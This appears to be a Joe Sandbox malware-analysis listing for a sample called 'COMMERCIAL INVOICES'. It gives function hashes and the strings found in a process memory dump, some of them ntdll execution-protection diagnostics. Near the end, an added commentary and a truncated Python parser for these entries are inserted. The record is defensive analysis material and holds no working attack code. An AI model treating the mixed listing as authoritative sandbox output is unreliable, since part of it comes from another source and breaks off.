• Opcode Fuzzy Hash: 4f4e756078df44a21c1faff916d7f181781623f0aed4500c7a79c8b413b2ee97
• Instruction Fuzzy Hash: 1190022922340402D680715C540860A000597D2202F99D415A1019558CC91989695325
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2bab2901009a61275211edc1f9028b0f6660cefcfeef9507094a04a30cc5fbde
• Instruction ID: 2360e666801d92344469f6b4944599acb74874e40b12243e6abc6343c4f68d1a
• Opcode Fuzzy Hash: 2bab2901009a61275211edc1f9028b0f6660cefcfeef9507094a04a30cc5fbde
• Instruction Fuzzy Hash: A590023125140802D641715C44046060009A7D1241F99C012A1428554EC6598B56AB65
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c27c408e1bb46812d7df7a0910b41eaf71800bc1e4e78fdd9fbffa47bda56e4
• Instruction ID: 3a79a41d787db5d11332207311ca548f6ac10b0fe2b46c219506f5483c9a25ac
• Opcode Fuzzy Hash: 4c27c408e1bb46812d7df7a0910b41eaf71800bc1e4e78fdd9fbffa47bda56e4
• Instruction Fuzzy Hash: 14900221252445525A45B15C44045074006A7E1241799C012A2418950CC52A9956D725
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d68137f45c1b5271bf730b2bdc0a9947161e735645f2c7b90354e952ecb3f25a
• Instruction ID: 7a163748cbd01d208bcdf3de84e8da21125be250b5fdde4bef2013834f674ed3
• Opcode Fuzzy Hash: d68137f45c1b5271bf730b2bdc0a9947161e735645f2c7b90354e952ecb3f25a
• Instruction Fuzzy Hash: B190023121140C42D600715C4404B46000597E1301F59C016A1128654DC619C9517625
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9b9828d368121609b0ceb1d8290666a05c72687b1b2c7fa148fd134fb6d076b7
• Instruction ID: 140790ba690b4cadb8b68377966754f7783bec1ec9cbeca58ec960676d54d96c
• Opcode Fuzzy Hash: 9b9828d368121609b0ceb1d8290666a05c72687b1b2c7fa148fd134fb6d076b7
• Instruction Fuzzy Hash: 3590023121140802D600759C5408646000597E1301F59D011A6028555EC66989916235
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bbea4e5c6725dfe7b3203b3edb16eb1b4d26f1b77bc7d859657c25740f402da2
• Instruction ID: d8d353df97b8354fca8a8710b2ed464c78fd37ed559996dc97f4454981ecb113
• Opcode Fuzzy Hash: bbea4e5c6725dfe7b3203b3edb16eb1b4d26f1b77bc7d859657c25740f402da2
• Instruction Fuzzy Hash: 9E90023121140803D600715C5508707000597D1201F59D411A1428558DD65A89516225
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 58e85228490281f32f7e8f04d1385e9ce8f3a28c72509ac61b0735cd0795e8c7
• Instruction ID: 5d98182a9d95f29490a979307acd796f98a4826373502360db3876109ca0c73b
• Opcode Fuzzy Hash: 58e85228490281f32f7e8f04d1385e9ce8f3a28c72509ac61b0735cd0795e8c7
• Instruction Fuzzy Hash: 3E90022161540802D640715C5418706001597D1201F59D011A1028554DC65D8B5567A5
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13b571c4b255ca56bfe85a490e49ac8403197d3baa196370d588a39fa354c7d2
• Instruction ID: b7084fc8f0f0b87db6dc263c0abc5dac8230928f00039a46622d6a19582e717c
• Opcode Fuzzy Hash: 13b571c4b255ca56bfe85a490e49ac8403197d3baa196370d588a39fa354c7d2
• Instruction Fuzzy Hash: A690026135140842D600715C4414B060005D7E2301F59C015E2068554DC61DCD52622A
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fcb95ab2c422625403439f0ad8303433306355fbf13466f1435f8c6492b420b8
                                                                                                                                                                                                                                      • Instruction ID: 56667f5ff26b1575244f98658fc20787bec7253cbaa3afd5349170cfccd15076
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcb95ab2c422625403439f0ad8303433306355fbf13466f1435f8c6492b420b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA90026122140442D604715C4404706004597E2201F59C012A3158554CC52D8D615229
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f251784f7d1c4791ad9dfc1caa2238c5cd94f5012b9edf00edc7463c2012b29e
                                                                                                                                                                                                                                      • Instruction ID: 7d195c9f78f0df1af48cb6ccf415e58047c49a4f039e878b613f3928336fb39e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f251784f7d1c4791ad9dfc1caa2238c5cd94f5012b9edf00edc7463c2012b29e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0190023121180802D600715C4808747000597D1302F59C011A6168555EC669C9916635
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 39e537a24de3a856b17e67c9980b1888b6d867513a7c1fb88ce58632e7999d88
                                                                                                                                                                                                                                      • Instruction ID: 1d33addc1e7c037fa0ea7be970f02bbdcd2f92adcf17fc2a873f3cf4be4130f0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39e537a24de3a856b17e67c9980b1888b6d867513a7c1fb88ce58632e7999d88
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C900221611404424640716C88449064005BBE2211759C121A199C550DC55D89655769
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4dfcf41c7d6f2a9b395285ebdf241cf300a99bc59fe833ed6b87d8b3fab288dd
                                                                                                                                                                                                                                      • Instruction ID: 1f550bad51af70821b404eab377338584c86a239e9bbc96f9c193187d5d51cae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dfcf41c7d6f2a9b395285ebdf241cf300a99bc59fe833ed6b87d8b3fab288dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4790023121180802D600715C481470B000597D1302F59C011A2168555DC62989516675
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e375c2a074d0c5189471f96ba8c1060cc10b56775b32135f9eefcd5d17a1b5ab
                                                                                                                                                                                                                                      • Instruction ID: e5f2bec8818ab7056b579437975c4a27e1dcf66a314fd8936bbd6bbd885743fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e375c2a074d0c5189471f96ba8c1060cc10b56775b32135f9eefcd5d17a1b5ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2900221221C0442D700756C4C14B07000597D1303F59C115A1158554CC91989615625
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 06518a6b5cf9a59c955856da64c9f9cde2b3d590ec73cb3cc1ac4584c24caf19
                                                                                                                                                                                                                                      • Instruction ID: 55b4be2e84dc2437745e55976c20646ce794fb26d46320617e864c0813564eef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06518a6b5cf9a59c955856da64c9f9cde2b3d590ec73cb3cc1ac4584c24caf19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F090022131140802D602715C44146060009D7D2345F99C012E2428555DC6298A53A236
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ce09669a12bf6fb7eba418104b7bfafae9d424c0bd1b37115893b9be647d8681
                                                                                                                                                                                                                                      • Instruction ID: 10a520d1bda7d295ba5ec10ccd05bac954b78e603473c0dc4160f82118c78102
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce09669a12bf6fb7eba418104b7bfafae9d424c0bd1b37115893b9be647d8681
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5290027121140802D640715C4404746000597D1301F59C011A6068554EC65D8ED56769
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 095ee5543573894066362f4fea170a730f2e298fe7626966bfd5095af3442525
                                                                                                                                                                                                                                      • Instruction ID: 4da4549befd4d089d8562477096d7a34a6bbc8fbd2c7e8960428fab4afadaffd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 095ee5543573894066362f4fea170a730f2e298fe7626966bfd5095af3442525
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3690022161140902D601715C4404616000A97D1241F99C022A2028555ECA298A92A235
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 51e7a10a9ba901800bf2f3b0a18a4a5da19a1b72a83d3a461761cd68c8fe19bc
                                                                                                                                                                                                                                      • Instruction ID: abd97887aca4ceff31301a432f8b8db6dc651642cf09de0526adf23df37ea2ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51e7a10a9ba901800bf2f3b0a18a4a5da19a1b72a83d3a461761cd68c8fe19bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A490026121180803D640755C4804607000597D1302F59C011A3068555ECA2D8D516239
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 89a4a24dc7a428ee0244f01032e782e9c838b282eec177c0f1ec71bcaf02ce13
                                                                                                                                                                                                                                      • Instruction ID: de33c303dca5815210d679ababb384cbf94291460be807c443fcbae2aca10693
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89a4a24dc7a428ee0244f01032e782e9c838b282eec177c0f1ec71bcaf02ce13
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F190022121184842D640725C4804B0F410597E2202F99C019A515A554CC91989555725
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 76b02f6f29eb90878568e479268f81f0a81bcc71fefd451e38560a52e4365736
                                                                                                                                                                                                                                      • Instruction ID: e01d5193767273bae02c73d0aa4a81bd927ab66bc01106d30a58b5d5ae1dfadd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76b02f6f29eb90878568e479268f81f0a81bcc71fefd451e38560a52e4365736
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3790022125140C02D640715C84147070006D7D1601F59C011A1028554DC61A8A6567B5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 42c055a46566e7af00632d3ea82be4c2a4fe6b3f9d3bc316f5ab95ae20895ad1
                                                                                                                                                                                                                                      • Instruction ID: 9746016ae35e97153d1272fa1168ef4a94d81655d564d93a55d76ca19ab7558d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42c055a46566e7af00632d3ea82be4c2a4fe6b3f9d3bc316f5ab95ae20895ad1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C90022125545502D650715C44046164005B7E1201F59C021A1818594DC55989556325
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: abf8d0b1a6fbe2a611216d38911eac96f946bc7a86072dba06a45fb172fad8b1
                                                                                                                                                                                                                                      • Instruction ID: e4ee4a9b905f55fa45c45efa68198b469ca32dbd3f3f607d45c2cdf5ba540a34
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abf8d0b1a6fbe2a611216d38911eac96f946bc7a86072dba06a45fb172fad8b1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC900231212405429A40725C5804A4E410597E2302B99D415A1019554CC91889615325
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 804c64f6a94c4fe4e343cb549cb4c83259a92bf0bfcbfea7228af5d8c71c3b65
                                                                                                                                                                                                                                      • Instruction ID: 4ed3ee26062d5618bcf70af5bf3eb4895fbb255311dcbe8151e15cf6a1d9a03f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 804c64f6a94c4fe4e343cb549cb4c83259a92bf0bfcbfea7228af5d8c71c3b65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F490023521140802DA10715C5804646004697D1301F59D411A1428558DC65889A1A225
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                      • Instruction ID: 29e6927d99b2765e6846c0ee09c39adc75e2256aa31bf01d1b475e726daf1453
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                      • Opcode ID: ce67c5f1b3d703b5e277bc758a14030c69b2f480c43f91e58bae67a7c1c8ef83
                                                                                                                                                                                                                                      • Instruction ID: e020f38a01b813b67720fe443ae37aa8aa1046e4b414ec143c15479766986013
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce67c5f1b3d703b5e277bc758a14030c69b2f480c43f91e58bae67a7c1c8ef83
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2551E6B6A30117BFCF11EB9D888097EFBB8BB492407108269E565D7681D374DE50C7A0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                      • Opcode ID: d5ceafb2a0cdc1a61aff75b373844482a1c01e59d2fa3402bcbddecfe298c7c4
                                                                                                                                                                                                                                      • Instruction ID: 28f54187c5e139f37c3dc30ef9e51b1358aefb0b0bd0b12cb675491945295e69
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5ceafb2a0cdc1a61aff75b373844482a1c01e59d2fa3402bcbddecfe298c7c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA5115B5A20646EFDB34DF9CD89087FFBF8EB45200F04846DE696D7641E6B4DA008B60
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • ExecuteOptions, xrefs: 012B46A0
                                                                                                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 012B4787
                                                                                                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 012B4742
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 012B4725
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 012B4655
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012B46FC
                                                                                                                                                                                                                                      • Execute=1, xrefs: 012B4713
                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: bbe0a396819c7ccacb255f84a4a553d008e17385036acded75dfbdd0a93abd42
• Instruction ID: 0ae3b150c90eb51c82e4134abd4a57805d12fb1f1859104732a86fc60590f387
• Opcode Fuzzy Hash: bbe0a396819c7ccacb255f84a4a553d008e17385036acded75dfbdd0a93abd42
• Instruction Fuzzy Hash: C051293162021ABEEF15AAA8DC8AFFF77A9AF14704F0400A9D605A7191E771AA41CF51
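The entries in this section share one source dump (process 4, offset 01210000, "based on PE: true"), and several of them reference strings that are ntdll.dll's own loader and run-time-library diagnostics ("CLIENT(ntdll): Found Execute=1 ...", "RTL: Enter CriticalSection Timeout ..."). A practitioner triaging a report like this usually wants those entries pulled out and grouped per dump rather than read one at a time. The following parser is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses the "Memory Dump Source" / "Similarity" entry format shown above, splits the `$`-joined API and string lists, and flags entries whose strings carry the `CLIENT(ntdll):` or `RTL:` markers. The sample input is constructed from two entries transcribed from this section (the ntdll-string entry and the `__aulldvrm` entry); the `$` separator and the field names are taken from the listing, and what a re-mapped ntdll image in that region means for this sample is an analyst judgement the report does not make here.

```python
"""Parse Joe Sandbox 'Similarity' function entries and flag ntdll diagnostics.

Added example, not code from the Joe Sandbox report. SAMPLE is constructed
from two entries transcribed from the report section above.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: two entries copied from the report. The first carries
# ntdll loader strings, the second only a CRT helper (__aulldvrm).
SAMPLE = """\
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: bbe0a396819c7ccacb255f84a4a553d008e17385036acded75dfbdd0a93abd42
• Instruction ID: 0ae3b150c90eb51c82e4134abd4a57805d12fb1f1859104732a86fc60590f387
• Opcode Fuzzy Hash: bbe0a396819c7ccacb255f84a4a553d008e17385036acded75dfbdd0a93abd42
• Instruction Fuzzy Hash: C051293162021ABEEF15AAA8DC8AFFF77A9AF14704F0400A9D605A7191E771AA41CF51
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction ID: 4d2daacbc32a3aa6b8f52d3a0d1e0171f50d34e643ab8d24c78bef3ac946214c
• Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction Fuzzy Hash: B081C231E3725A9EEF29BE6CC8517BE7BA1AF45310F1C421DDA61A72D1C63498408B51
"""

# A field line looks like "• Key: value"; the key never contains a colon.
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Prefixes of ntdll's own debug/trace strings as they appear in the report.
NTDLL_MARKERS = ("CLIENT(ntdll):", "RTL:")


def _split_list(val: str) -> List[str]:
    # Joe Sandbox joins the APIs/strings referenced by one function with '$'
    # (assumption drawn from the listing; strings containing '$' would split).
    return [s for s in val.split("$") if s] if val else []


def parse_entries(text: str) -> List[Dict[str, object]]:
    """Return one dict per 'Memory Dump Source' entry with normalised keys."""
    entries: List[Dict[str, object]] = []
    cur: Dict[str, object] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            entries.append(cur)
            continue
        m = FIELD_RE.match(line)
        if not m or not entries:
            continue  # section labels ("Similarity") or text before any entry
        key, val = m.group("key").strip(), m.group("val").strip()
        if key == "String ID":
            cur["strings"] = _split_list(val)
        elif key == "API ID":
            cur["apis"] = _split_list(val)
        elif key == "Source File":
            # "<dump file>, Offset: <hex>, based on PE: <true|false>"
            parts = [p.strip() for p in val.split(",")]
            cur["source_file"] = parts[0]
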